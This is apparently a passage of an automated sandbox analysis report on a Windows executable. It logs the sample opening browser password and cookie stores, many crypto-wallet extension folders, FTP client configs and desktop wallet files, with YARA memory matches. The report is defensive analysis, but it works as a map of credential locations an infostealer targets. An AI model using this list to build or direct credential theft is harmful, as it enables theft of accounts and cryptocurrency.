                Source: C:\Users\user\Desktop\mG83m82qhF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
                Source: C:\Users\user\Desktop\mG83m82qhF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
                Source: C:\Users\user\Desktop\mG83m82qhF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
                Source: C:\Users\user\Desktop\mG83m82qhF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
                Source: C:\Users\user\Desktop\mG83m82qhF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
                Source: C:\Users\user\Desktop\mG83m82qhF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
                Source: C:\Users\user\Desktop\mG83m82qhF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
                Source: C:\Users\user\Desktop\mG83m82qhF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
                Source: C:\Users\user\Desktop\mG83m82qhF.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Users\user\Desktop\mG83m82qhF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
                Source: C:\Users\user\Desktop\mG83m82qhF.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\logins.jsonJump to behavior
                Source: C:\Users\user\Desktop\mG83m82qhF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
                Source: C:\Users\user\Desktop\mG83m82qhF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
                Source: C:\Users\user\Desktop\mG83m82qhF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
                Source: C:\Users\user\Desktop\mG83m82qhF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
                Source: C:\Users\user\Desktop\mG83m82qhF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
                Source: C:\Users\user\Desktop\mG83m82qhF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifdJump to behavior
                Source: C:\Users\user\Desktop\mG83m82qhF.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\cert9.dbJump to behavior
                Source: C:\Users\user\Desktop\mG83m82qhF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
                Source: C:\Users\user\Desktop\mG83m82qhF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
                Source: C:\Users\user\Desktop\mG83m82qhF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
                Source: C:\Users\user\Desktop\mG83m82qhF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
                Source: C:\Users\user\Desktop\mG83m82qhF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
                Source: C:\Users\user\Desktop\mG83m82qhF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Users\user\Desktop\mG83m82qhF.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\prefs.jsJump to behavior
                Source: C:\Users\user\Desktop\mG83m82qhF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Source: C:\Users\user\Desktop\mG83m82qhF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
                Source: C:\Users\user\Desktop\mG83m82qhF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
                Source: C:\Users\user\Desktop\mG83m82qhF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
                Source: C:\Users\user\Desktop\mG83m82qhF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
                Source: C:\Users\user\Desktop\mG83m82qhF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
                Source: C:\Users\user\Desktop\mG83m82qhF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
                Source: C:\Users\user\Desktop\mG83m82qhF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
                Source: C:\Users\user\Desktop\mG83m82qhF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
                Source: C:\Users\user\Desktop\mG83m82qhF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
                Source: C:\Users\user\Desktop\mG83m82qhF.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\cookies.sqliteJump to behavior
                Source: C:\Users\user\Desktop\mG83m82qhF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
                Source: C:\Users\user\Desktop\mG83m82qhF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
                Source: C:\Users\user\Desktop\mG83m82qhF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
                Source: C:\Users\user\Desktop\mG83m82qhF.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\formhistory.sqliteJump to behavior
                Source: C:\Users\user\Desktop\mG83m82qhF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
                Source: C:\Users\user\Desktop\mG83m82qhF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Users\user\Desktop\mG83m82qhF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
                Source: C:\Users\user\Desktop\mG83m82qhF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
                Source: C:\Users\user\Desktop\mG83m82qhF.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Users\user\Desktop\mG83m82qhF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
                Source: C:\Users\user\Desktop\mG83m82qhF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
                Source: C:\Users\user\Desktop\mG83m82qhF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
                Source: C:\Users\user\Desktop\mG83m82qhF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
                Source: C:\Users\user\Desktop\mG83m82qhF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
                Source: C:\Users\user\Desktop\mG83m82qhF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
                Source: C:\Users\user\Desktop\mG83m82qhF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
                Source: C:\Users\user\Desktop\mG83m82qhF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
                Source: C:\Users\user\Desktop\mG83m82qhF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
                Source: C:\Users\user\Desktop\mG83m82qhF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
                Source: C:\Users\user\Desktop\mG83m82qhF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
                Source: C:\Users\user\Desktop\mG83m82qhF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
                Source: C:\Users\user\Desktop\mG83m82qhF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
                Source: C:\Users\user\Desktop\mG83m82qhF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
                Source: C:\Users\user\Desktop\mG83m82qhF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
                Source: C:\Users\user\Desktop\mG83m82qhF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
                Source: C:\Users\user\Desktop\mG83m82qhF.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\key4.dbJump to behavior
                Source: C:\Users\user\Desktop\mG83m82qhF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
                Source: C:\Users\user\Desktop\mG83m82qhF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
                Source: C:\Users\user\Desktop\mG83m82qhF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
                Source: C:\Users\user\Desktop\mG83m82qhF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
                Source: C:\Users\user\Desktop\mG83m82qhF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
                Source: C:\Users\user\Desktop\mG83m82qhF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
                Source: C:\Users\user\Desktop\mG83m82qhF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
                Source: C:\Users\user\Desktop\mG83m82qhF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
                Source: C:\Users\user\Desktop\mG83m82qhF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
                Source: C:\Users\user\Desktop\mG83m82qhF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
                Source: C:\Users\user\Desktop\mG83m82qhF.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
                Source: C:\Users\user\Desktop\mG83m82qhF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
                Source: C:\Users\user\Desktop\mG83m82qhF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
                Source: C:\Users\user\Desktop\mG83m82qhF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
                Source: C:\Users\user\Desktop\mG83m82qhF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
                Source: C:\Users\user\Desktop\mG83m82qhF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
                Source: C:\Users\user\Desktop\mG83m82qhF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                Source: C:\Users\user\Desktop\mG83m82qhF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
                Source: C:\Users\user\Desktop\mG83m82qhF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
                Source: C:\Users\user\Desktop\mG83m82qhF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
                Source: C:\Users\user\Desktop\mG83m82qhF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
                Source: C:\Users\user\Desktop\mG83m82qhF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
                Source: C:\Users\user\Desktop\mG83m82qhF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
                Source: C:\Users\user\Desktop\mG83m82qhF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
                Source: C:\Users\user\Desktop\mG83m82qhF.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
                Source: C:\Users\user\Desktop\mG83m82qhF.exeFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
                Source: C:\Users\user\Desktop\mG83m82qhF.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
                Source: C:\Users\user\Desktop\mG83m82qhF.exeFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
                Source: C:\Users\user\Desktop\mG83m82qhF.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
                Source: C:\Users\user\Desktop\mG83m82qhF.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
                Source: C:\Users\user\Desktop\mG83m82qhF.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
                Source: C:\Users\user\Desktop\mG83m82qhF.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                Source: C:\Users\user\Desktop\mG83m82qhF.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                Source: C:\Users\user\Desktop\mG83m82qhF.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
                Source: C:\Users\user\Desktop\mG83m82qhF.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
                Source: C:\Users\user\Desktop\mG83m82qhF.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                Source: C:\Users\user\Desktop\mG83m82qhF.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                Source: C:\Users\user\Desktop\mG83m82qhF.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
                Source: C:\Users\user\Desktop\mG83m82qhF.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
                Source: C:\Users\user\Desktop\mG83m82qhF.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
                Source: C:\Users\user\Desktop\mG83m82qhF.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
                Source: C:\Users\user\Desktop\mG83m82qhF.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
                Source: C:\Users\user\Desktop\mG83m82qhF.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
                Source: C:\Users\user\Desktop\mG83m82qhF.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\mG83m82qhF.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\mG83m82qhF.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\mG83m82qhF.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\mG83m82qhF.exeDirectory queried: C:\Users\user\Documents\EFOYFBOLXAJump to behavior
                Source: C:\Users\user\Desktop\mG83m82qhF.exeDirectory queried: C:\Users\user\Documents\EFOYFBOLXAJump to behavior
                Source: C:\Users\user\Desktop\mG83m82qhF.exeDirectory queried: C:\Users\user\Documents\EWZCVGNOWTJump to behavior
                Source: C:\Users\user\Desktop\mG83m82qhF.exeDirectory queried: C:\Users\user\Documents\EWZCVGNOWTJump to behavior
                Source: C:\Users\user\Desktop\mG83m82qhF.exeDirectory queried: C:\Users\user\Documents\NVWZAPQSQLJump to behavior
                Source: C:\Users\user\Desktop\mG83m82qhF.exeDirectory queried: C:\Users\user\Documents\NVWZAPQSQLJump to behavior
                Source: C:\Users\user\Desktop\mG83m82qhF.exeDirectory queried: C:\Users\user\Documents\NWCXBPIUYIJump to behavior
                Source: C:\Users\user\Desktop\mG83m82qhF.exeDirectory queried: C:\Users\user\Documents\NWCXBPIUYIJump to behavior
                Source: C:\Users\user\Desktop\mG83m82qhF.exeDirectory queried: C:\Users\user\Documents\PIVFAGEAAVJump to behavior
                Source: C:\Users\user\Desktop\mG83m82qhF.exeDirectory queried: C:\Users\user\Documents\PIVFAGEAAVJump to behavior
                Source: C:\Users\user\Desktop\mG83m82qhF.exeDirectory queried: C:\Users\user\Documents\PWCCAWLGREJump to behavior
                Source: C:\Users\user\Desktop\mG83m82qhF.exeDirectory queried: C:\Users\user\Documents\PWCCAWLGREJump to behavior
                Source: C:\Users\user\Desktop\mG83m82qhF.exeDirectory queried: C:\Users\user\Documents\QCOILOQIKCJump to behavior
                Source: C:\Users\user\Desktop\mG83m82qhF.exeDirectory queried: C:\Users\user\Documents\QCOILOQIKCJump to behavior
                Source: C:\Users\user\Desktop\mG83m82qhF.exeDirectory queried: C:\Users\user\Documents\SUAVTZKNFLJump to behavior
                Source: C:\Users\user\Desktop\mG83m82qhF.exeDirectory queried: C:\Users\user\Documents\SUAVTZKNFLJump to behavior
                Source: C:\Users\user\Desktop\mG83m82qhF.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\mG83m82qhF.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\mG83m82qhF.exeDirectory queried: C:\Users\user\Documents\EFOYFBOLXAJump to behavior
                Source: C:\Users\user\Desktop\mG83m82qhF.exeDirectory queried: C:\Users\user\Documents\EFOYFBOLXAJump to behavior
                Source: C:\Users\user\Desktop\mG83m82qhF.exeDirectory queried: C:\Users\user\Documents\EWZCVGNOWTJump to behavior
                Source: C:\Users\user\Desktop\mG83m82qhF.exeDirectory queried: C:\Users\user\Documents\EWZCVGNOWTJump to behavior
                Source: C:\Users\user\Desktop\mG83m82qhF.exeDirectory queried: C:\Users\user\Documents\NWCXBPIUYIJump to behavior
                Source: C:\Users\user\Desktop\mG83m82qhF.exeDirectory queried: C:\Users\user\Documents\NWCXBPIUYIJump to behavior
                Source: C:\Users\user\Desktop\mG83m82qhF.exeDirectory queried: C:\Users\user\Documents\PIVFAGEAAVJump to behavior
                Source: C:\Users\user\Desktop\mG83m82qhF.exeDirectory queried: C:\Users\user\Documents\PIVFAGEAAVJump to behavior
                Source: C:\Users\user\Desktop\mG83m82qhF.exeDirectory queried: C:\Users\user\Documents\PWCCAWLGREJump to behavior
                Source: C:\Users\user\Desktop\mG83m82qhF.exeDirectory queried: C:\Users\user\Documents\PWCCAWLGREJump to behavior
                Source: C:\Users\user\Desktop\mG83m82qhF.exeDirectory queried: C:\Users\user\Documents\SUAVTZKNFLJump to behavior
                Source: C:\Users\user\Desktop\mG83m82qhF.exeDirectory queried: C:\Users\user\Documents\SUAVTZKNFLJump to behavior
                Source: C:\Users\user\Desktop\mG83m82qhF.exeDirectory queried: C:\Users\user\Documents\ZGGKNSUKOPJump to behavior
                Source: C:\Users\user\Desktop\mG83m82qhF.exeDirectory queried: C:\Users\user\Documents\ZGGKNSUKOPJump to behavior
                Source: C:\Users\user\Desktop\mG83m82qhF.exeDirectory queried: C:\Users\user\Documents\EFOYFBOLXAJump to behavior
                Source: C:\Users\user\Desktop\mG83m82qhF.exeDirectory queried: C:\Users\user\Documents\EFOYFBOLXAJump to behavior
                Source: C:\Users\user\Desktop\mG83m82qhF.exeDirectory queried: C:\Users\user\Documents\PIVFAGEAAVJump to behavior
                Source: C:\Users\user\Desktop\mG83m82qhF.exeDirectory queried: C:\Users\user\Documents\PIVFAGEAAVJump to behavior
                Source: C:\Users\user\Desktop\mG83m82qhF.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\mG83m82qhF.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\mG83m82qhF.exeDirectory queried: C:\Users\user\Documents\NWCXBPIUYIJump to behavior
                Source: C:\Users\user\Desktop\mG83m82qhF.exeDirectory queried: C:\Users\user\Documents\NWCXBPIUYIJump to behavior
                Source: C:\Users\user\Desktop\mG83m82qhF.exeDirectory queried: C:\Users\user\Documents\PIVFAGEAAVJump to behavior
                Source: C:\Users\user\Desktop\mG83m82qhF.exeDirectory queried: C:\Users\user\Documents\PIVFAGEAAVJump to behavior
                Source: C:\Users\user\Desktop\mG83m82qhF.exeDirectory queried: C:\Users\user\Documents\QCOILOQIKCJump to behavior
                Source: C:\Users\user\Desktop\mG83m82qhF.exeDirectory queried: C:\Users\user\Documents\QCOILOQIKCJump to behavior
                Source: C:\Users\user\Desktop\mG83m82qhF.exeDirectory queried: C:\Users\user\Documents\SUAVTZKNFLJump to behavior
                Source: C:\Users\user\Desktop\mG83m82qhF.exeDirectory queried: C:\Users\user\Documents\SUAVTZKNFLJump to behavior
                Source: C:\Users\user\Desktop\mG83m82qhF.exeDirectory queried: C:\Users\user\Documents\ZGGKNSUKOPJump to behavior
                Source: C:\Users\user\Desktop\mG83m82qhF.exeDirectory queried: C:\Users\user\Documents\ZGGKNSUKOPJump to behavior
                Source: C:\Users\user\Desktop\mG83m82qhF.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\mG83m82qhF.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\mG83m82qhF.exeDirectory queried: C:\Users\user\Documents\EFOYFBOLXAJump to behavior
                Source: C:\Users\user\Desktop\mG83m82qhF.exeDirectory queried: C:\Users\user\Documents\EFOYFBOLXAJump to behavior
                Source: C:\Users\user\Desktop\mG83m82qhF.exeDirectory queried: C:\Users\user\Documents\PIVFAGEAAVJump to behavior
                Source: C:\Users\user\Desktop\mG83m82qhF.exeDirectory queried: C:\Users\user\Documents\PIVFAGEAAVJump to behavior
                Source: C:\Users\user\Desktop\mG83m82qhF.exeDirectory queried: C:\Users\user\Documents\SUAVTZKNFLJump to behavior
                Source: C:\Users\user\Desktop\mG83m82qhF.exeDirectory queried: C:\Users\user\Documents\SUAVTZKNFLJump to behavior
                Source: C:\Users\user\Desktop\mG83m82qhF.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\mG83m82qhF.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\mG83m82qhF.exeDirectory queried: C:\Users\user\Documents\ZGGKNSUKOPJump to behavior
                Source: C:\Users\user\Desktop\mG83m82qhF.exeDirectory queried: C:\Users\user\Documents\ZGGKNSUKOPJump to behavior
                Source: C:\Users\user\Desktop\mG83m82qhF.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\mG83m82qhF.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\mG83m82qhF.exeDirectory queried: C:\Users\user\Documents\EFOYFBOLXAJump to behavior
                Source: C:\Users\user\Desktop\mG83m82qhF.exeDirectory queried: C:\Users\user\Documents\EFOYFBOLXAJump to behavior
                Source: C:\Users\user\Desktop\mG83m82qhF.exeDirectory queried: number of queries: 1001
                Source: Yara matchFile source: 00000000.00000003.1426197522.0000000000B0E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.1455318191.0000000000B0F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.1454724980.0000000000B0F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.1456122443.0000000000B0F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.1452173526.0000000000B0E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.1453035473.0000000000B0F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.1454957001.0000000000B0F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.1456365966.0000000000AC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.1455686356.0000000000B0F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.1455516828.0000000000B0F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.1453162697.0000000000B0F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.1456773192.0000000000B18000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.1456839533.0000000000AC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
